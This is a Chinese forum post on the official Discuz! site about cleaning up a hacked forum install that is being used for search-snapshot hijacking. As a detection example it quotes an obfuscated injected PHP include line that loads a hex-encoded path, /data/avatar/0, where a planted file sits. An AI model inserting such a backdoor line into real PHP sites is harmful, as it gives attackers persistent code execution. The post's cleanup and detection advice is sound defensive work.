Discuz! 官方站

 找回密码
 立即注册

QQ登录

只需一步,快速开始

搜索
12
返回列表 发新帖

[新需求] 目录文件权限

[复制链接]
发表于 2021-1-3 23:13:02 | 显示全部楼层
关于被挂马,劫持快照问题:. g; s  ?2 e. o, t% U) Y

+ i+ U+ O( g1 D( n) g用以下方法试试" v: O; |3 c" X3 i$ R" {8 d; V$ d
8 Y% F; n; L2 x! @& ?
若存在,处理前,先卸载所有盗版插件与模版。. n- ]6 V% c- \, p- c3 F$ Q
% i/ Z9 r9 o2 Q( G  b2 \
进discuz后台找到工具-文件校验,看下最近有哪些php文件被修改了。
+ I5 N8 _/ j& \, D, d
4 b. `7 n% Y4 V3 U! B1、排查网站源文件的php 文件,查看是否有出现IP地址、或者异常网站(上面跳转的网站),如果有删除就可以了。* Z" H" }5 N: Q+ X1 Z

5 h0 ^* V- [7 w2、排查网站源文件的php 文件,查看是否有如下代码:@include($_SERVER['DOCUMENT_ROOT']
4 a6 `7 O  T: M- J& i" r  t$ Q
, B" E  |" L  k6 n0 X% s8 T+ C(排查一般用WEBshell后门扫描软件扫描核查!)
; S! d! k' Q$ M
+ C. S, H0 I, Q4 l  g如果有就删除此段代码。并把该段代码进行解密。- ^8 `  `+ [2 Z
8 o3 j* V2 F5 v1 c5 Q1 W! b
举例:@include($_SERVER['DOCUMENT_ROOT'].PACK('H*','2F646174612F6176617461722F30'));
5 ^$ o; T- {+ b; |9 e% a2 z: Z/ T% t6 B+ s/ M& g& I. Q
需要解密的代码为:2F646174612F6176617461722F30& k$ Q7 C3 {+ f# ^* B7 k' M4 f
& F, C; E/ |+ Q
解密后为:/data/avatar/0
6 i5 M* _& Y# `. ~# P+ c$ V1 H9 m
2 f2 C0 }4 Q) m$ W代码解密地址:http://www.bejson.com/convert/ox2str/, f' v: W7 T: h* S  Z

4 j1 r" G- [- y+ w" i3 ?
6 Y6 |2 N0 B2 y. q8 e5 U意思就是在上述路径下存在被非法上传的文件,用于做快照劫持。
& ~, P, R- L3 i* y3 |
3 M8 ^$ R5 {# N解决办法:删除上面的代码和文件即可。3 g9 V4 v4 O6 W! [5 G: a

6 O, ~* _7 z& X+ r  r  {! N挂马问题解决了后,记得更改服务器相关的各种密码,尽量设置的复杂一点。
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Discuz! Q 1.0 正式发布,5 分钟快速生成粉丝社区,助力内容创作者快速变现

小黑屋|Discuz! 官方站 ( 粤B2-20090059-165 )star

GMT+8, 2021-1-24 07:03 , Processed in 0.055694 second(s), 13 queries , Gzip On.

Powered by Discuz! X3.4

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表